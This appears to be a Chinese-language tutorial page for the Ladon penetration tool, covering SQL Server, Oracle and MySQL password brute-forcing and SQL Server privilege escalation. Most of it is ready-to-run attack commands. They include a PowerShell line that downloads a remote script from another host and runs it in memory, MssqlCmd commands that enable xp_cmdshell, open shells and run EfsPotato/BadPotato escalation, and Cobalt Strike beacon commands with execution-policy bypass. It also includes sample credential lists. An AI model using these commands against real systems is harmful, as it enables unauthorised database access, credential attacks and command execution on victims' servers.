Ladon渗透SQL Server数据库一键提权 密码爆破

<% Visit 145 %>

1433端口 Mssql数据库密码爆破

1
Ladon 192.168.1.8/24 MssqlScan

image

配置密码爆破参数

1 支持标准的user.txt和pass.txt帐密破解,爆破每个用户都需将密码跑完或跑出正确为此
2 支持userpass.txt(存放用户名和对应密码),用于快速验证其它机器是否存在相同帐密
3 支持check.txt(存放IP/端口/库名/用户/密码),不指定端口和数据库名则使用默认

user.txt和pass.txt分别存放用户、密码
userpass.txt存放用户密码组,即每行存放用户以及密码
check.txt每行存放IP\端口\用户\密码

数据库口令检测

mssql密码验证

(大型内网可能从其它机器收集到大量机器密码,第一步肯定是先验证)
非默认端口请将以下端口改成被修改端口即可,单个IP可直接Ladon IP:端口 MssqlScan扫描
check.txt
192.168.1.8 1433 master sa k8gege
192.168.1.8 sa k8gege
192.168.1.8 1433 sa k8gege
命令: Ladon MssqlScan

Oracle同理

192.168.1.8 1521 orcl system k8gege
192.168.1.8 orcl system k8gege
192.168.1.8 system k8gege
命令: Ladon OrcleScan

Mysql无需指定数据库名

192.168.1.8 3306 root k8gege
192.168.1.8 root k8gege
命令: Ladon MssqlScan

PowerLadon

远程加载MssqlScan 1521端口弱口令爆破

powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.3:800/Ladon.ps1'); Ladon 192.168.1.141 MssqlScan”

Kali、Linux、Mac、路由器等操作系统

./Ladon 192.168.1.8/24 MssqlScan
image

Mssql数据库远程提权工具

image

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

本地:

Ladon MssqlCmd host info
Ladon MssqlCmd host open_shell
Ladon MssqlCmd host close_shell
Ladon MssqlCmd host xp_cmdshell cmdline
Ladon MssqlCmd host ws_shell cmdline
Ladon MssqlCmd host r_shell cmdline
Ladon MssqlCmd host py_shell cmdline
Ladon MssqlCmd host install_clr
Ladon MssqlCmd host uninstall_clr
Ladon MssqlCmd host clr_exec cmdline
Ladon MssqlCmd host clr_efspotato cmdline
Ladon MssqlCmd host clr_badpotato cmdline

远程:

Ladon MssqlCmd host user pass master info
Ladon MssqlCmd host port user pass master open_shell
Ladon MssqlCmd host port user pass master close_shell
Ladon MssqlCmd host user pass master xp_cmdshell cmdline
Ladon MssqlCmd host user pass master ws_shell cmdline
Ladon MssqlCmd host user pass master r_shell cmdline
Ladon MssqlCmd host user pass master py_shell cmdline
Ladon MssqlCmd host user pass master install_clr
Ladon MssqlCmd host user pass master uninstall_clr
Ladon MssqlCmd host user pass master clr_exec cmdline
Ladon MssqlCmd host user pass master clr_efspotato cmdline
Ladon MssqlCmd host user pass master clr_badpotato cmdline

image

Cobalt Strike

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
本机:
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host info
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host open_shell
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host close_shell
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host xp_cmdshell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host ws_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host r_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host py_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host install_clr
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host uninstall_clr
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host clr_exec cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host clr_efspotato cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host clr_badpotato cmdline

远程:
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master info
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host port user pass master open_shell
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host port user pass master close_shell
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master xp_cmdshell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master ws_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master r_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master py_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master install_clr
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master uninstall_clr
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master clr_exec cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master clr_efspotato cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master clr_badpotato cmdline

工具下载

最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases